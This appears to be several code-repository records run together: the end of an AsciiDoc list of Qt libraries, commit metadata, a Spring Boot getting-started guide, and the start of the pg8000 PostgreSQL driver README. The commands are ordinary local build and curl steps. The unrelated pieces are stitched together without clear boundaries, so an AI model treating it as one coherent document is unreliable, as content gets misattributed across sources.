I think this is the best I can say\n\/\/ right now, but help improving this is more than welcome.\n\nhttps:\/\/github.com\/gamecreature\/QtAwesome::\nLibrary for using http:\/\/fortawesome.github.io\/Font-Awesome\/[Font Awesome] or\nother icon sets based on font files.\n\nhttp:\/\/qwt.sourceforge.net\/::\nQt Widgets for Technical Applications. Contains GUI components and utility\nclasses which are primarily useful for programs with a technical background.\nBesides a framework for 2D plots it provides scales, sliders, dials, compasses,\nthermometers, wheels and knobs to control or display values, arrays, or ranges\nof type double.\n\n\n=== Hardware detection and interaction\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/bluez-qt\/html\/::\nBluezQt is a library for communication with the BlueZ system and session\ndaemons.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/solid\/html\/::\nA device integration framework. It provides a way of querying and\ninteracting with hardware independently of the underlying operating system.\nIt provides the following features for application developers: Hardware\nDiscovery, Power Management, and Network Management.\n\n\n=== Inter process communication\n\n\n=== Multimedia\n\nhttp:\/\/www.qtav.org\/::\nQtAV is a multimedia playback library based on Qt and FFmpeg. Supports Android,\niOS and desktops.\n\nhttps:\/\/vlc-qt.tano.si\/::\nContains core classes for main media playback and some GUI classes for faster\nmedia player development.\n\n=== Network protocols and web services\n\nhttp:\/\/communi.github.io\/::\nA cross-platform IRC framework. Provides a set of tools for enabling IRC\nconnectivity in Qt-based C++ and QML applications.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kdnssd\/html\/::\nLibrary for handling the DNS-based Service Discovery Protocol (DNS-SD), the\nlayer of Zeroconf that allows network services, such as printers, to be\ndiscovered without any user intervention or centralized infrastructure.\n\nhttps:\/\/github.com\/wiedi\/libmaia::\nXML-RPC library.\n\nhttps:\/\/github.com\/Cutehacks\/qml-pusher::\nQML bindings for the Pusher.com service.\n\nhttps:\/\/github.com\/qxmpp-project\/qxmpp::\nXMPP client and server library. QXmpp strives to be as easy to use as possible:\nthe underlying TCP socket, the core XMPP RFCs (RFC3920 and RFC3921) and XMPP\nextensions have been nicely encapsulated into classes. QXmpp comes with full API\ndocumentation, automatic tests and many examples.\n\n\n=== Other programming languages\n\nhttps:\/\/github.com\/seanchas116\/libqmlbind::\nA C library for easily creating QML bindings for other languages by exporting\nobjects to QML. In use in `ruby-qml`.\n\nhttps:\/\/github.com\/trollixx\/node.qml::\nNode.js compatibility layer to QML applications. Potentially, QML applications\nshould be able to use the majority of Node.js libraries.\n\nhttp:\/\/www.riverbankcomputing.com\/software\/pyqt\/::\nA set of Python 2 and Python 3 bindings for Qt that runs on all platforms\nsupported by Qt including Windows, OS X and Linux. PyQt5 supports Qt 5.\n\nhttp:\/\/thp.io\/2011\/pyotherside\/::\nAsynchronous Python 3 Bindings for Qt 5. This is a QML Plugin that provides\naccess to a Python 3 interpreter from QML.\n\nhttps:\/\/wiki.qt.io\/Category:LanguageBindings::PySide::\nProvides LGPL-licensed Python bindings for Qt. 
It also includes a complete\ntoolchain for rapidly generating bindings for any Qt-based C++ class\nhierarchy.\n\nhttp:\/\/sourceforge.net\/projects\/pythonqt\/::\nEmbeds Python in a Qt application, making classes based on `QObject` accessible\nto the scripting language.\n\nhttps:\/\/github.com\/svalaskevicius\/qtjs-generator::\nQt API bindings generator for Node.js. Exposes the Qt API to JavaScript, running\nin an integrated event loop inside Node.js.\n\nhttp:\/\/seanchas116.github.io\/ruby-qml\/::\nBindings between Ruby and QML. Enables you to write Qt Quick GUIs in Ruby.\n\n\n=== Threading and asynchronous programming\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/threadweaver\/html\/::\nHelper for multithreaded programming. It uses a job-based interface to queue\ntasks and execute them in an efficient way. You simply divide the workload into\njobs, state the dependencies between the jobs and ThreadWeaver will work out the\nmost efficient way of dividing the work between threads within a set of resource\nlimits.\n\n\n=== User Interface\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kguiaddons\/html\/::\nUtilities for graphical user interfaces in the areas of colors, fonts, text,\nimages, keyboard input.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemmodels\/html\/::\nA set of extra item models for the model-view framework.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kitemviews\/html\/::\nIncludes a set of views, which can be used with item models. It includes views\nfor categorizing lists and to add search filters to flat and hierarchical lists.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kwidgetsaddons\/html\/::\nAction classes that can be added to toolbars or menus, a wide range of widgets\nfor selecting characters, fonts, colors, actions, dates and times, or MIME\ntypes, as well as platform-aware dialogs for configuration pages, message boxes,\nand password requests.\n\nhttps:\/\/github.com\/mikemcquaid\/Qocoa::\nWrappers for OS X Cocoa widgets. {MIT}\n\nhttps:\/\/github.com\/shadone\/qtmacgoodies::\nAdditional widgets\/objects to make applications look more native on Mac OS X,\nlike `MacPreferencesWindow`, `MacStandardIcon` or `MacWindow`.\n\nhttps:\/\/github.com\/cybercatalyst\/qtsystemtrayiconmac::\nExtended QSystemTrayIcon for Mac OS X.\n\n\n=== Web frameworks\n\nhttp:\/\/cutelyst.org\/::\nMVC web framework inspired by Perl's Catalyst.\n\nhttps:\/\/github.com\/jlaine\/qdjango\/::\nQDjango is a web framework written in C++ and built on top of the Qt library.\nWhere possible it tries to follow django's API, hence its name.\n\nhttp:\/\/www.treefrogframework.org\/::\nHigh-speed and full-stack web application framework based on C++ and Qt, which\nsupports the HTTP and WebSocket protocols. Web applications can run faster than\nthose written in lightweight programming languages. 
In application development, it provides an\nO\/R mapping system and template system on an MVC architecture, and aims to achieve\nhigh productivity through the policy of convention over configuration.\n\nhttps:\/\/github.com\/vinipsmaker\/tufao::\nTuf\u00e3o is a web framework for C++ that makes use of Qt's object communication\nsystem (signals & slots).\n\n\n=== Miscellany\n\nhttps:\/\/github.com\/sergey-shambir\/breakpad-qt::\nCross-platform crash handler, implemented as a wrapper around google-breakpad.\n\nhttps:\/\/github.com\/dschmidt\/libcrashreporter-qt::\nProvides an easy integration of Google Breakpad crash reporting into a Qt\napplication.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kconfig\/html\/::\nProvides an advanced configuration system. The core provides access to the\nfiles, with a code generation system to have type safe access to the\nconfiguration, which features cascading files (global versus local), shell\nexpansion, and locking down options. The GUI provides a way to hook widgets to\nthe configuration so that they are automatically initialized from the\nconfiguration and automatically propagate their changes to their respective\nconfiguration files.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kcoreaddons\/html\/::\nSupport classes for manipulating mime types, autosaving files, creating backup\nfiles, generating random sequences, performing text manipulations such as macro\nreplacement, accessing user information and more.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/ki18n\/html\/::\nProvides functionality for internationalizing user interface text in\napplications, based on the GNU Gettext translation system. It wraps the standard\nGettext functionality, so that the programmers and translators can use the\nfamiliar Gettext tools and workflows. KI18n provides additional functionality:\nargument capturing, customizable markup, and translation scripting.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/kidletime\/html\/::\nReports information on idle time. It is useful not only for finding out about\nthe current idle time of the PC, but also for getting notified upon idle time\nevents, such as custom timeouts or user activity.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeemegaup\/::\nWrapper around Sparkle and WinSparkle.\n\nhttps:\/\/github.com\/Roxee\/qt-roxeeplatipus::\nA collection of helpers and additional functionalities for Qt (media key\nsupport, OS X remote control, fullscreen native window hack).\n\nhttps:\/\/github.com\/Roxee\/qt-roxeesinapp::\nAn up-to-date QtSingleApplication fork.\n\nhttps:\/\/github.com\/VerbalExpressions\/QtVerbalExpressions::\nRegular Expressions made easy. Match and replace in strings with an easy to use\nAPI.\n\nhttp:\/\/api.kde.org\/frameworks-api\/frameworks5-apidocs\/sonnet\/html\/::\nPlugin-based spell checking library for Qt-based applications. It supports\nseveral different plugins, including HSpell, Enchant, ASpell and HUNSPELL. It\nalso supports automated language detection, based on a combination of different\nalgorithms.\n\n\n== Tools\n\nhttps:\/\/github.com\/sletta\/dqml::\nA simple live coding environment for QML. 
It will track the directory where a\nQML file is located and continuously update the view where it is located.\nSupports pushing files to a remote system which will reload the received files.\n\nhttps:\/\/github.com\/KDAB\/GammaRay::\nGammaRay is a tool to poke around in a Qt application and also to manipulate the\napplication to some extent.\n\nhttps:\/\/github.com\/Pelagicore\/qmllive::\nA live coding environment for QML. Allows you to reload your QML view when a file in\nyour project changes. This can be done on the same device using the QmlLiveBench\nor on a remote device using the QmlLiveRuntime.\n\nhttps:\/\/github.com\/robertknight\/Qt-Inspector::\nUtility to browse the Qt object tree of a running Qt application and edit object\nproperties on the fly.\n\n\n\n== Off topic\n\nNOTE: Stuff that might not integrate at all with Qt's types, API, event loop,\netc., but which an application built with Qt can still leverage well enough, because\nit is cross-platform native code that fulfills a common use case of the typical\nQt applications.\n\nhttps:\/\/github.com\/Mendeley\/breakpad::\nThis is a fork of Google Breakpad, a multi-platform crash reporting system,\nwhich is used by Mendeley Desktop under Windows, Mac and Linux.\n\nhttps:\/\/github.com\/Mendeley\/Update-Installer::\nSmall cross-platform software update installer.\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"52680f02b7e4dd9756f5cd6b7d3a41495fbfbafc","subject":"Update README.adoc","message":"Update README.adoc\n\nFix typo","repos":"loosebazooka\/simple-spring-boot-appengine-app","old_file":"README.adoc","new_file":"README.adoc","new_contents":":spring_boot_version: 0.5.0.M6\n:spring-boot: https:\/\/github.com\/spring-projects\/spring-boot\n:toc:\n:icons: font\n:source-highlighter: prettify\n:project_id: gs-spring-boot\nThis guide provides a sampling of how {spring-boot}[Spring Boot] helps you accelerate and facilitate application development. As you read more Spring Getting Started guides, you will see more use cases for Spring Boot.\nIt is meant to give you a quick taste of Spring Boot. If you want to create your own Spring Boot-based project, visit \nhttp:\/\/start.spring.io\/[Spring Initializr], fill in your project details, pick your options, and you can download either\na Maven build file, or a bundled up project as a zip file.\n\n== What you'll build\nYou'll build a simple web application with Spring Boot and add some useful services to it.\n\n== What you'll need\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/prereq_editor_jdk_buildtools.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/how_to_complete_this_guide.adoc[]\n\n\n[[scratch]]\n== Set up the project\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/build_system_intro.adoc[]\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_directory_structure_hello.adoc[]\n\n\ninclude::https:\/\/raw.github.com\/spring-guides\/getting-started-macros\/master\/create_both_builds.adoc[]\n\n`build.gradle`\n\/\/ AsciiDoc source formatting doesn't support groovy, so using java instead\n[source,java]\n----\ninclude::initial\/build.gradle[]\n----\n\n== Learn what you can do with Spring Boot\n\nSpring Boot offers a fast way to build applications. It looks at your classpath and at beans you have configured, makes reasonable assumptions about what you're missing, and adds it. 
With Spring Boot you can focus more on business features and less on infrastructure.\n\nFor example:\n\n- Got Spring MVC? There are several specific beans you almost always need, and Spring Boot adds them automatically. A Spring MVC app also needs a servlet container, so Spring Boot automatically configures embedded Tomcat.\n- Got Jetty? If so, you probably do NOT want Tomcat, but instead embedded Jetty. Spring Boot handles that for you.\n- Got Thymeleaf? There are a few beans that must always be added to your application context; Spring Boot adds them for you.\n\nThese are just a few examples of the automatic configuration Spring Boot provides. At the same time, Spring Boot doesn't get in your way. For example, if Thymeleaf is on your path, Spring Boot adds a `SpringTemplateEngine` to your application context automatically. But if you define your own `SpringTemplateEngine` with your own settings, then Spring Boot won't add one. This leaves you in control with little effort on your part.\n\nNOTE: Spring Boot doesn't generate code or make edits to your files. Instead, when you start up your application, Spring Boot dynamically wires up beans and settings and applies them to your application context.\n\n== Create a simple web application\nNow you can create a web controller for a simple web application.\n\n`src\/main\/java\/hello\/HelloController.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/HelloController.java[]\n----\n \nThe class is flagged as a `@RestController`, meaning it's ready for use by Spring MVC to handle web requests. `@RequestMapping` maps `\/` to the `index()` method. When invoked from a browser or using curl on the command line, the method returns pure text. That's because `@RestController` combines `@Controller` and `@ResponseBody`, two annotations that result in web requests returning data rather than a view.\n\n== Create an Application class\nHere you create an `Application` class with the components:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::initial\/src\/main\/java\/hello\/Application.java[]\n----\n \n- `@Configuration` tags the class as a source of bean definitions for the application context.\n- `@EnableAutoConfiguration` tells Spring Boot to start adding beans based on classpath settings, other beans, and various property settings.\n- Normally you would add `@EnableWebMvc` for a Spring MVC app, but Spring Boot adds it automatically when it sees **spring-webmvc** on the classpath. This flags the application as a web application and activates key behaviors such as setting up a `DispatcherServlet`.\n- `@ComponentScan` tells Spring to look for other components, configurations, and services in the `hello` package, allowing it to find the `HelloController`.\n\nThe `main()` method uses Spring Boot's `SpringApplication.run()` method to launch an application. Did you notice that there wasn't a single line of XML? No **web.xml** file either. This web application is 100% pure Java and you didn't have to deal with configuring any plumbing or infrastructure.\n\nThe `run()` method returns an `ApplicationContext` and this application then retrieves all the beans that were created either by your app or were automatically added thanks to Spring Boot. 
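\n\nSince both classes are pulled in above via `include::` directives, here is a minimal sketch of what they can look like, reconstructed from the descriptions in this section and shown in one listing for brevity (the guide keeps them in separate files); treat it as a sketch consistent with the text, not the guide's verbatim source:\n\n[source,java]\n----\npackage hello;\n\nimport java.util.Arrays;\n\nimport org.springframework.boot.SpringApplication;\nimport org.springframework.boot.autoconfigure.EnableAutoConfiguration;\nimport org.springframework.context.ApplicationContext;\nimport org.springframework.context.annotation.ComponentScan;\nimport org.springframework.context.annotation.Configuration;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RestController;\n\n@RestController\nclass HelloController {\n\n    \/\/ Maps \"\/\" and returns plain text, as described above\n    @RequestMapping(\"\/\")\n    public String index() {\n        return \"Greetings from Spring Boot!\";\n    }\n}\n\n@Configuration\n@EnableAutoConfiguration\n@ComponentScan\npublic class Application {\n\n    public static void main(String[] args) {\n        \/\/ Launch the app and get back the context holding all the beans\n        ApplicationContext ctx = SpringApplication.run(Application.class, args);\n\n        System.out.println(\"Let's inspect the beans provided by Spring Boot:\");\n\n        \/\/ Retrieve, sort, and print every bean name\n        String[] beanNames = ctx.getBeanDefinitionNames();\n        Arrays.sort(beanNames);\n        for (String beanName : beanNames) {\n            System.out.println(beanName);\n        }\n    }\n}\n----\n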
The application sorts them and prints them out.\n\n== Run the application\nTo run the application, execute:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou should see some output like this:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nhandlerExceptionResolver\nhelloController\nhttpRequestHandlerAdapter\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedTomcat\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\ntomcatEmbeddedServletContainerFactory\nviewControllerHandlerMapping\n....\n\nYou can clearly see **org.springframework.boot.autoconfigure** beans. There is also a `tomcatEmbeddedServletContainerFactory`.\n\nCheck out the service.\n\n....\n$ curl localhost:8080\nGreetings from Spring Boot!\n....\n\n== Switch from Tomcat to Jetty\nWhat if you prefer Jetty over Tomcat? Jetty and Tomcat are both compliant servlet containers, so it should be easy to switch. With Spring Boot, it is!\n\nChange your `build.gradle` to exclude Tomcat, then add Jetty to the list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-web:0.5.0.M6\") {\n exclude module: \"spring-boot-starter-tomcat\"\n }\n compile(\"org.springframework.boot:spring-boot-starter-jetty:0.5.0.M6\")\n----\n\nIf you are using Maven, the changes look like this:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-web<\/artifactId>\n <exclusions>\n <exclusion>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-tomcat<\/artifactId>\n <\/exclusion>\n <\/exclusions>\n <\/dependency>\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-jetty<\/artifactId>\n <\/dependency>\n----\n\nThis change isn't about comparing Tomcat vs. Jetty. 
Instead, it demonstrates how Spring Boot reacts to what is on your classpath.\n\nAs you can see below, the code is the same as before:\n\n`src\/main\/java\/hello\/Application.java`\n[source,java]\n----\ninclude::complete\/src\/main\/java\/hello\/Application.java[]\n----\n \n\n== Re-run the application\n\nRun the app again:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nNow check out the output:\n\n....\nLet's inspect the beans provided by Spring Boot:\napplication\nbeanNameHandlerMapping\ndefaultServletHandlerMapping\ndispatcherServlet\nembeddedServletContainerCustomizerBeanPostProcessor\nfaviconHandlerMapping\nfaviconRequestHandler\nhandlerExceptionResolver\nhelloController\nhiddenHttpMethodFilter\nhttpRequestHandlerAdapter\njettyEmbeddedServletContainerFactory\nmessageSource\nmvcContentNegotiationManager\nmvcConversionService\nmvcValidator\norg.springframework.boot.autoconfigure.MessageSourceAutoConfiguration\norg.springframework.boot.autoconfigure.PropertyPlaceholderAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$DispatcherServletConfiguration\norg.springframework.boot.autoconfigure.web.EmbeddedServletContainerAutoConfiguration$EmbeddedJetty\norg.springframework.boot.autoconfigure.web.ServerPropertiesAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter\norg.springframework.boot.autoconfigure.web.WebMvcAutoConfiguration$WebMvcAutoConfigurationAdapter$FaviconConfiguration\norg.springframework.boot.context.embedded.properties.ServerProperties\norg.springframework.context.annotation.ConfigurationClassPostProcessor.enhancedConfigurationProcessor\norg.springframework.context.annotation.ConfigurationClassPostProcessor.importAwareProcessor\norg.springframework.context.annotation.internalAutowiredAnnotationProcessor\norg.springframework.context.annotation.internalCommonAnnotationProcessor\norg.springframework.context.annotation.internalConfigurationAnnotationProcessor\norg.springframework.context.annotation.internalRequiredAnnotationProcessor\norg.springframework.web.servlet.config.annotation.DelegatingWebMvcConfiguration\npropertySourcesBinder\npropertySourcesPlaceholderConfigurer\nrequestMappingHandlerAdapter\nrequestMappingHandlerMapping\nresourceHandlerMapping\nsimpleControllerHandlerAdapter\nviewControllerHandlerMapping\n....\n\nThere is little change from the previous output, except there is no longer a `tomcatEmbeddedServletContainerFactory`. Instead, there is a new `jettyEmbeddedServletContainerFactory`. \n\nOtherwise, everything is the same, as it should be. Most beans listed above provide Spring MVC's production-grade features. Simply swapping one part, the servlet container, shouldn't cause a system-wide ripple.\n\n== Add production-grade services\nIf you are building a web site for your business, you probably need to add some management services. 
Spring Boot provides several out of the box with its https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-actuator\/README.md[actuator module], such as health, audits, beans, and more.\n\nAdd this to your build file's list of dependencies:\n\n[source,groovy]\n----\n compile(\"org.springframework.boot:spring-boot-starter-actuator:0.5.0.M6\")\n----\n\nIf you are using Maven, add this to your list of dependencies:\n\n[source,xml]\n----\n <dependency>\n <groupId>org.springframework.boot<\/groupId>\n <artifactId>spring-boot-starter-actuator<\/artifactId>\n <\/dependency>\n----\n\nThen restart the app:\n\n[subs=\"attributes\"]\n----\n.\/gradlew build && java -jar build\/libs\/{project_id}-0.1.0.jar\n----\n\nIf you are using Maven, execute:\n\n[subs=\"attributes\"]\n----\nmvn package && java -jar target\/{project_id}-0.1.0.jar\n----\n\nYou will see a new set of RESTful end points added to the application. These are management services provided by Spring Boot.\n\n....\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[],custom=[]}\" onto public java.util.Map<java.lang.String, java.lang.Object> org.springframework.boot.ops.web.BasicErrorController.error(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.592 INFO 43851 ... Mapped \"{[\/error],methods=[],params=[],headers=[],consumes=[],produces=[text\/html],custom=[]}\" onto public org.springframework.web.servlet.ModelAndView org.springframework.boot.ops.web.BasicErrorController.errorHtml(javax.servlet.http.HttpServletRequest)\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/env] onto handler of type [class org.springframework.boot.ops.endpoint.EnvironmentEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/health] onto handler of type [class org.springframework.boot.ops.endpoint.HealthEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/beans] onto handler of type [class org.springframework.boot.ops.endpoint.BeansEndpoint]\n2013-08-01 08:03:42.844 INFO 43851 ... Mapped URL path [\/info] onto handler of type [class org.springframework.boot.ops.endpoint.InfoEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/metrics] onto handler of type [class org.springframework.boot.ops.endpoint.MetricsEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/trace] onto handler of type [class org.springframework.boot.ops.endpoint.TraceEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/dump] onto handler of type [class org.springframework.boot.ops.endpoint.DumpEndpoint]\n2013-08-01 08:03:42.845 INFO 43851 ... Mapped URL path [\/shutdown] onto handler of type [class org.springframework.boot.ops.endpoint.ShutdownEndpoint]\n....\n\nThey include: errors, http:\/\/localhost:8080\/env[environment], http:\/\/localhost:8080\/health[health], http:\/\/localhost:8080\/beans[beans], http:\/\/localhost:8080\/info[info], http:\/\/localhost:8080\/metrics[metrics], http:\/\/localhost:8080\/trace[trace], http:\/\/localhost:8080\/dump[dump], and shutdown.\n\nIt's easy to check the health of the app.\n\n----\n$ curl localhost:8080\/health\nok\n----\n\nYou can invoke shutdown through curl.\n\n----\n$ curl -X POST localhost:8080\/shutdown\n----\n\nThe response shows that shutdown through REST is currently disabled by default:\n----\n{\"message\":\"Shutdown not enabled, sorry.\"}\n----\n\nWhew! 
You probably don't want that until you are ready to turn on proper security
settings, if at all.

For more details about each of these REST endpoints and how you can tune their
settings with an `application.properties` file, check out the
{spring-boot}[Spring Boot] project.

== View Spring Boot's starters
You have seen some of Spring Boot's **starters**. You can see them all
https://github.com/spring-projects/spring-boot/tree/master/spring-boot-starters[here].

== JAR support and Groovy support
The last example showed how Spring Boot makes it easy to wire beans that you
may not be aware you need. It also showed how to turn on convenient management
services.

But Spring Boot does more. It supports not only traditional WAR file
deployments, but also makes it easy to put together executable JARs, thanks to
Spring Boot's loader module. The various guides demonstrate this dual support
through the `spring-boot-gradle-plugin` and `spring-boot-maven-plugin`.

On top of that, Spring Boot also has Groovy support, allowing you to build
Spring MVC web apps with as little as a single file.

Create a new file called **app.groovy** and put the following code in it:

[source,groovy]
----
@RestController
class ThisWillActuallyRun {

    @RequestMapping("/")
    String home() {
        return "Hello World!"
    }

}
----

NOTE: It doesn't matter where the file is. You can even fit an application that
small inside a
https://twitter.com/rob_winch/status/364871658483351552[single tweet]!

Next, https://github.com/spring-projects/spring-boot#installing-the-cli[install
Spring Boot's CLI].

Run it as follows:

----
$ spring run app.groovy
----

NOTE: This assumes you shut down the previous application, to avoid a port
collision.

From a different terminal window:
----
$ curl localhost:8080
Hello World!
----

Spring Boot does this by dynamically adding key annotations to your code and
leveraging http://groovy.codehaus.org/Grape[Groovy Grapes] to pull down the
libraries needed to make the app run.

== Summary
Congratulations! You built a simple web application with Spring Boot and
learned how it can ramp up your development pace. You also turned on some handy
production services.
This is only a small sampling of what Spring Boot can do. Check out
http://projects.spring.io/spring-boot/docs/README.html[Spring Boot's README]
if you want to dig deeper.

= pg8000
:toc: preamble

pg8000 is a pure-link:http://www.python.org/[Python]
http://www.postgresql.org/[PostgreSQL] driver that complies with
http://www.python.org/dev/peps/pep-0249/[DB-API 2.0]. It is tested on Python
versions 3.6+, on CPython and PyPy, and PostgreSQL versions 9.5+.
pg8000's name comes from the belief that it is probably about the 8000th
PostgreSQL interface for Python.
pg8000 is distributed under the BSD 3-clause
license.

All bug reports, feature requests and contributions are welcome at
http://github.com/tlocke/pg8000/.

image::https://github.com/tlocke/pg8000/workflows/pg8000/badge.svg[Build Status]


== Installation

To install pg8000 using `pip` type:

`pip install pg8000`


== Native API Interactive Examples

pg8000 comes with two APIs, the native pg8000 API and the DB-API 2.0 standard
API. These are the examples for the native API; the DB-API 2.0 examples follow
in the next section.


=== Basic Example

Import pg8000, connect to the database, create a table, add some rows and then
query the table:

[source,python]
----
>>> import pg8000.native
>>>
>>> # Connect to the database with user name postgres
>>>
>>> con = pg8000.native.Connection("postgres", password="cpsnow")
>>>
>>> # Create a temporary table
>>>
>>> con.run("CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)")
[]
>>>
>>> # Populate the table
>>>
>>> for title in ("Ender's Game", "The Magus"):
...     con.run("INSERT INTO book (title) VALUES (:title)", title=title)
[]
[]
>>>
>>> # Print all the rows in the table
>>>
>>> for row in con.run("SELECT * FROM book"):
...     print(row)
[1, "Ender's Game"]
[2, 'The Magus']

----


=== Transactions

Here's how to run groups of SQL statements in a
https://www.postgresql.org/docs/current/tutorial-transactions.html[transaction]:

[source,python]
----
>>> con.run("START TRANSACTION")
[]
>>> con.run("INSERT INTO book (title) VALUES (:title)", title="Phineas Finn")
[]
>>> con.run("COMMIT")
[]
>>> for row in con.run("SELECT * FROM book"):
...     print(row)
[1, "Ender's Game"]
[2, 'The Magus']
[3, 'Phineas Finn']

----

And here's how to roll back a transaction:

[source,python]
----
>>> con.run("START TRANSACTION")
[]
>>> con.run("DELETE FROM book WHERE title = :title", title="Phineas Finn")
[]
>>> con.run("ROLLBACK")
[]
>>> for row in con.run("SELECT * FROM book"):
...     print(row)
[1, "Ender's Game"]
[2, 'The Magus']
[3, 'Phineas Finn']

----


=== Query Using Functions

Another query, using some PostgreSQL functions:

[source,python]
----
>>> con.run("SELECT extract(millennium from now())")
[[3.0]]

----


=== Interval Type

A query that returns the PostgreSQL interval type:

[source,python]
----
>>> import datetime
>>>
>>> ts = datetime.date(1980, 4, 27)
>>> con.run("SELECT timestamp '2013-12-01 16:06' - :ts", ts=ts)
[[datetime.timedelta(days=12271, seconds=57960)]]

----


=== Point Type

A round-trip with a
https://www.postgresql.org/docs/current/datatype-geometric.html[PostgreSQL
point] type:

[source,python]
----
>>> con.run("SELECT CAST(:pt as point)", pt='(2.3,1)')
[['(2.3,1)']]

----


=== Client Encoding

When communicating with the server, pg8000 uses the character set that the
server asks it to use (the client encoding). By default the client encoding is
the database's character set (chosen when the database is created), but the
client encoding can be changed in a number of ways (eg. setting
CLIENT_ENCODING in postgresql.conf). Another way of changing the client
encoding is by using an SQL command. For example:

[source,python]
----
>>> con.run("SET CLIENT_ENCODING TO 'UTF8'")
[]
>>> con.run("SHOW CLIENT_ENCODING")
[['UTF8']]

----


=== JSON

https://www.postgresql.org/docs/current/datatype-json.html[JSON] always comes
back from the server de-serialized.
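For example (a minimal sketch, reusing the same `con` as above; the query is
ours, not from the original text), a `jsonb` value arrives as a Python object:

[source,python]
----
>>> con.run('''SELECT CAST('{"a": 1}' AS jsonb)''')
[[{'a': 1}]]

----
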
